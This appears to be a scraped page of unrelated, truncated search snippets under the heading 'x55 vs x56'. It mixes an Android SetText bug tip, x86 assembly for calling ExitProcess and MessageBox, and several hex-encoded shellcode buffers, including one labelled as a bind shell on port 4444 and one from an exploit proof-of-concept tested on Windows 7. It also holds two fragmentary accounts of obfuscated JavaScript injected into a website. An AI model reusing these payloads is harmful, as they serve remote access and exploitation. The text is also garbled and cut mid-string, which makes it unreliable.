x55 vs x56

If you encounter this problem, consider the following reasons first:Did you set an int variable in the SetText () method, such as SetText (10).In this way, the Android system will take the initiative to find the resource file, but it is not a resource file ID, so will report this bug.WORKAROUND: Convert int business data to string type, such as Tv_price.settext (price+ "");"Resource notfoundexception USD: # 0 X55 string resource" caused by:android.con

ExitProcess lea ECX, [ebx-0x1e]; push ecx; PUSH[EBP + 0x08]; CALL[EBP + 0x10]; MOV[EBP-0X08], eax; Show Lea ECX, [ebx-0x12]; Push 0; push ecx; push ecx; Push 0; CALL[EBP-0X04]; Push 0; CALL[EBP-0X08]; mov esp, EBP; Pop

\ x42 \ x42 \ x41 \ x42 \ x58 \ x50 \ x38 \ x41 \ x42""\ X75 \ x4a \ x49 \ x39 \ x6c \ x58 \ x68 \ x6d \ x59 \ x55 \ x50 \ x65 \ x50 \ x45""\ X50 \ x55 \ x30 \ x4e \ x69 \ x39 \ x75 \ x55 \ x61 \ x39 \ x42 \ x61 \ x74 \ x4c""\ X4b \ x51 \ x42 \ x50 \ x30 \ x6e \ x6b \ x73 \ x62 \ x36 \ x6c \ x6e \ x6b \ x63""\ X62 \ x57 \ x64 \ x6c \ x4b \ x53 \ x42 \

function address of ExitProcess lea ECX, [ebx-0x1e]; push ecx; PUSH[EBP + 0x08]; CALL[EBP + 0x10]; MOV[EBP-0X08], eax; Show Lea ECX, [ebx-0x12]; Push 0; push ecx; push ecx; Push 0; CALL[EBP-0X04]; Push 0; CALL[EBP-0X08]; mov esp, EBP;

: metacom# Version: version 0.8.18# Category: poc# Tested on: windows 7 GermanBeginShellcode ="\ X89 \ xe0 \ xdb \ xc8 \ xd9 \ xf4 \ x5b \ x53 \ x59 \ x49 \ x49 \ x49 \ x49 \ x49" +"\ X43 \ x43 \ x43 \ x43 \ x43 \ x43 \ x51 \ x5a \ x56 \ x54 \ x58 \ x33 \ x30 \ x56" +"\ X58 \ x34 \ x41 \ x50 \ x30 \ x41 \ x33 \ x48 \ x48 \ x30 \ x41 \ x30 \ x30 \ x30 \ x41" +"\ X42 \ x41 \ x41 \ x42 \ x54 \ x41 \ x41 \ x51

\ x6a \ x4a "" \ x58 \ x30 \ x42 \ x30 \ x50 \ x41 \ x6b \ x41 \ x41 \ x5a \ x42 \ x32 \ x41 \ x42 \ x32 \ x42 "" \ x41 \ x41 \ x30 \ x42 \ x41 \ x58 \ x50 \ x38 \ x41 \ x42 \ x75 \ x7a \ x49 \ x79 \ x6c \ x69 "" \ x78 \ x51 \ x54 \ x57 \ cross 7 \ x43 \ x30 \ x63 \ x30 \ x4c \ x4b \ x67 \ x35 \ x45 \ x6c \ x6e "" \ x6b \ x71 \ x6c \ x66 \ x65 \ x43 \ x48 \ x55 \ x51 \ x5a \ x4f \ x4e \ x6b \ x4f \ x42 "\ x38 \ x4c \ x4b \ x43 \ x6f \ x51 \ x30 \

\ x51 \ x5a \ x6a \ x41 \ x58 \ x50 \ x30 \ x41 \ x30 \ x41 \ x6b \ x41" Buf + = "\ x41 \ x51 \ x32 \ x41 \ x42 \ x32 \ x42 \ x42 \ x30 \ x42 \ x42 \ x41 \ x42" Buf + = "\ x58 \ x50 \ x38 \ x41 \ x42 \ x75 \ x4a \ x49 \ x49 \ x6c \ x69 \ x78 \ x6e" Buf + = "\ x66 \ x53 \ x30 \ x35 \ x50 \ x73 \ x30 \ x75 \ x30 \ x6d \ x59 \ x4a \ x45" Buf + = "\ x35 \ x61 \ x4e \ x32 \ x33 \ x54 \ x6c \ x4b \ x31 \ x42 \ x66 \ x50 \ x6c" Buf + = "\ x4b \ x62 \ x72 \ x34 \ x4c \ x6c \ x4b \ x73 \ x62 \ x52 \ x34

Theoretical basis: Assuming you need to eject a messagebox, you need to use at least the following APIs or modules: GetProcAddress ()------>14byte Loadlibraryexa ()------->14byte ExitProcess ()------------->11byte User32.dll ()--------------->10byte MessageBox ()----------->11byte Just a simple MessageBox has 60 logically unrelated bytes involved and must be optimized Method: Through the algorithm into a 32-bit hash summary Algorithm Desig

\ x00 \ x05 \ x6d \ x61 \ x6a \ x6f \ x72 \ x49 \ x00 \ x05 \ x6d \ x69 \ x6e \ x6f \ x72 \ x49 \ x00 \ x0b \ cross \ x61 \ x74 \ x63 \ x68 \ x55 \ cross V \ x64 \ x61 \ x74 \ x65 \ x49 \ x00 \ x0c \ x72 \ x6f \ x6c \ x6c \ x69 \ x6e \ x67 \ x50 \ x61 \ x74 \ x63 \ x68 \ x49 \ x00 \ x0b \ x73 \ x65 \ x72 \ x76 \ x69 \ x63 \ x65 \ x50 \ x61 \ x63 \ x6b \ x5a \ x00 \ x0e \ x74 \ x65 \ x6d \ cross \ x6f \ x72 \ x61 \ x72 \ x79 \ x50 \ x61 \ x74 \ x63 \

\ x00 \ x00 \ x00 \ x43 \ x00 \ x41 \ x00 \ x64 \ x00 \ xBB \ x00" # last w0rd"\ X00 \ x42 \ x00 \ x49 \ x00 \ x54 \ x00 \ x56 \ x00 \ x61 \ x00 \ x6c \ x00 \ x75 \ x00 \ x65""\ X00 \ x4d \ x00 \ x61 \ x00 \ x00 \ x00 \ x00 \ x00 \ x11 \ x00 \ x00 \ x00 \ x43 \ x00 \ x41""\ X00 \ x64 \ x00 \ x76 \ x00 \ x42 \ x00 \ x59 \ x00 \ x54 \ x00 \ x45 \ x00 \ x56 \ x00 \ x61""\ X00 \ x6c \ x00 \ x75 \ x00 \ x65 \ x

/X60" "/X38/x88/x88/x88/x01/xce/x5e/xbb/x77/x09/x64/x7c/x89/x88/x88/xdc" "/Xe0/x89/x89/x88/x88/x77/xde/x7c/xd8/xd8/xd8/xd8/xc8/xd8/xc8/xd8" "/X77/xde/x78/x03/x50/xdf/xe0/x8a/x88/XAB/x6f/x03/x44/xe2/x9e" "/Xd9/XDB/x77/xde/x64/xdf/XDB/x77/xde/X60/xbb/x77/xdf/xd9/XDB/x77" "/Xde/x6a/x03/x58/x01/xce/x36/xe0/xeb/xe5/xec/x88/x01/xee/x4a/x0b" "/X4c/x24/x05/xb4/xac/xbb/x48/xbb/x41/x08/x49/x9d/x23/x6a/x75/x4e" "/Xcc/xac/x98/Xcc/x76/Xcc/xac/xb5/x01/xdc/xac/xc0/x01/xdc/xac/xc4" "/X01/xdc/xac/xd8/x05/Xcc/xac

\x3e\x78\x31\x90"buf+="\x6c\x5f\x58\xee\x84\xb0\x30\x87\x60\xec\x58\x25\xad"buf+="\x4a\x6b\xc6\xb7\xd8\x70\xb8\x2f\xc8\xd9\xcf\xec\x10"buf+="\xcb\x67\x90\xf2\xdf\xf2\x4a\xf3\x23\xf6\xd1\x12\xa5"buf+="\xfb\x10\xa9\x56\x4e\xd0\xdc\x10\x21\x1d\xb5\x58\x17"buf+="\xe1\x6d\x69\x74\xc7\xac\x58\x1a\xc9\xf7\x00\xf8\x54"buf+="\x76\x05\x6d\xd4\x9e\x9c\x22\xdb\x0f\xa9\xfa\xe3\x8b"buf+="\x8e\x1a\x1f\x60\xdb\xbe\xef\x2f\x73\xa5\x42\x02\x93"buf+="\x89\x0f\x42\xfa\xa

= "\xba\x2e\x27\xc2\x55\xdb\xdc\xd9\x74\x24\xf4\x5f\x2b\xc9" + "\xb1\x56\x31\x57\x13\x83\xef\xfc\x03\x57\x21\xc5\x37\xa9" + "\xd5\x80\xb8\x52\x25\xf3\x31\xb7\x14\x21\x25\xb3\x04\xf5" + "\x2d\x91\xa4\x7e\x63\x02\x3f\xf2\xac\x25\x88\xb9\x8a\x08" + "\x09\x0c\x13\xc6\xc9\x0e\xef\x15\x1d\xf1\xce\xd5\x50\xf0" + "\x17\x0b\x9a\xa0\xc0\x47\x08\x55\x64\x15\x90\x54\x

When I found my website last night, I had a bunch of JS code in front of the page code HTML. Just started to think that the site was black, hurriedly to the server to see if all files with this string of JS code, search results are not, and the server did not find traces of intrusion. So can only start from this code, I download this JS development discovery is the following section of code: Copy Code code as follows: window["\x64\x6f\x63\x75\x6d\x65\x6e\x74" ["\x77\x72\x69\x74\x65

/xc5/xbd""/Xd5/x10/xc5/xbd/xc9/x14/xdd/xbd/x89/XCD/xc9/xc8/xc8/xc8/xf3/x98""/Xc8/xc8/x66/XeF/xa9/xc8/x66/xcf/x89/X12/x55/xf3/x66/x66/xA8/x66""/Xcf/x95/X12/x51/x72/x16/Xcc/xcf/XFD/x38/xa9/x99/x99/x99/x1c/x59""/Xe1/x95/X12/xd9/x95/X12/xe9/x85/x34/X12/xf1/x91/x72/x90/X12/xd9""/XAD/X12/x31/X21/x99/x99/x99/X12/x5c/xc7/xc4/x5b/x9d/x99/xca/Xcc""/Xcf/xce/X12/xf5/xbd/x81/X12/xdc/xa5/X12/XCD/x9c/xe1/x9a/x4c/X12""/XD3/x81/X12/xc3/xb9/x9a/x44/x7a/XAB/xd0/X12/XAD/

/x14/xdd/xbd/x89/XCD/xc9/xc8/xc8/xc8/xf3/x98""/Xc8/xc8/x66/XeF/xa9/xc8/x66/xcf/x89/X12/x55/xf3/x66/x66/xA8/x66""/Xcf/x95/X12/x51/x72/x16/Xcc/xcf/XFD/x38/xa9/x99/x99/x99/x1c/x59""/Xe1/x95/X12/xd9/x95/X12/xe9/x85/x34/X12/xf1/x91/x72/x90/X12/xd9""/XAD/X12/x31/X21/x99/x99/x99/X12/x5c/xc7/xc4/x5b/x9d/x99/xca/Xcc""/Xcf/xce/X12/xf5/xbd/x81/X12/xdc/xa5/X12/XCD/x9c/xe1/x9a/x4c/X12""/XD3/x81/X12/xc3/xb9/x9a/x44/x7a/XAB/xd0/X12/XAD/X12/x9a/x6c/xAA""/X66/X65/xAA/

\ xD6 "."\ XD5 \ xD4 \ xD3 \ xD2 \ xD1 \ xD0 \ xCF \ xCE \ xCD \ xCC \ xCB \ xCA \ xC9 \ xC8 \ xC7 \ xC6 \ xC5 \ xC4 \ xC3 \ xC2 \ xC1 \ xC0 \ xBF \ xBE \ xBD "."\ XBC \ xBB \ xBA \ xB9 \ xB8 \ xB7 \ xB6 \ xB5 \ xB4 \ xB3 \ xB2 \ xB1 \ xB0 \ xAF \ xAE \ xAD \ xAC \ xAB \ xAA \ xA9 \ xA8 \ xA7 \ xA6 \ xA5 \ xA4 "."\ XA3 \ xA2 \ xA1 \ xA0 \ x9F \ x9E \ x9D \ x9C \ x9B \ x9A \ x99 \ x98 \ x97 \ x96 \ x95 \ x94 \ x93 \ x92 \ x91 \ x90 \ x8F \ x8E \ x8D \ x8C \ x8B "."\ X8A \ x89 \ x88 \ x87 \ x86 \

'######################################## #### # Bind port 4444SC _bind ="\ Xbd \ x0e \ x27 \ x05 \ xab \ xda \ xdb \ xd9 \ x74 \ x24 \ xf4 \ x5a \ x33 \ xc9" +"\ Xb1 \ x56 \ x83 \ xc2 \ x04 \ x31 \ x6a \ x0f \ x03 \ x6a \ x01 \ xc5 \ xf0 \ x57" +"\ Xf5 \ x80 \ xfb \ xa7 \ x05 \ xf3 \ x72 \ x42 \ x34 \ x21 \ xe0 \ x06 \ x64 \ xf5" +"\ X62 \ x4a \ x84 \ x7e \ x26 \ x7f \ x1f \ xf2 \ xef \ cross city \ xa8 \ xb9 \ xc9 \ xbf" +"\ X29 \ x0c \ xd6 \ x6c \

\ x74 \ x26""\ X86 \ xdb \ x74 \ xcd \ xca \ xcf \ x0f \ xa3 \ xc2 \ xe0 \ xb8 \ x0e \ x35 \ xce""\ X39 \ xbf \ xf9 \ x9c \ xf9 \ xa1 \ x85 \ xde \ x2d \ x02 \ xb7 \ x10 \ x20 \ x43""\ Xf0 \ x4d \ xca \ x11 \ xa9 \ x1a \ x78 \ x86 \ xde \ x5f \ x40 \ xa7 \ x30 \ xd4""\ Xf8 \ xdf \ x35 \ x2b \ x8c \ x55 \ x37 \ x7c \ x3c \ xe1 \ x7f \ x64 \ x37 \ xad""\ X5f \ x95 \ x94 \ xad \ x9c \ xdc \ x91 \ x06 \ x56 \

At this point check the source code can be found at the top of the page was added a sentence But this code doesn't always appear. I thought the server was attacked or the virus was in the server. Checked all pages and related files that have occurred No Exceptions found The server didn't find any intrusion marks either. Download this JS file to the local, open after the discovery is the following code window["\x64\x6f\x63\x75\x6d\x65\x6e\x74" ["\x77\x72\x69\x74\x65\x6c\x6e"] ("\x3c\x44\x49\